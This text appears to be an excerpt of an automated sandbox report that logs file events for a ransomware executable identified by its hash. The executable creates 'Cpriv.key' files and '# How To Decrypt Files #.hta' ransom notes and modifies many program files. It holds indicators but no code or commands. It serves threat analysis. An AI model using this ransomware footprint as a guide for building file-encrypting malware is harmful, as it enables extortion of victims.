Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\XML Files\StarterToolTemplates.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07804_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03257_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.DOC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\7-Zip\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CASCADE\CASCADE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\COMPUTER.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICSTYLES.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Photo Viewer\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SAFRI_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_04.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SUMER_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0335112.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\XML Files\StarterNotificationDescriptors.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewFrame.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107514.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00668_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-uihandler.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\messageboxerror.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00233_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228959.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\TEAROFF.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02282_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Triedit\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14883_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02282_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21422_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_mid_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\JUDGESCH.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\AXIS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\LAUNCH.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105376.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBBTN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Access.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\PushSync.tmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrusalm.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Shorthand.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\JOURNAL\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GRINTL32.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL048.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02288_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\bdcmetadata.xsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090390.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Office\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01569_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN105.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Payment Type.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\ORG97.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Faculty.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msadomd28.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Waveform.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00392_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OLKIRMV.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0324704.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15184_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Sts.css 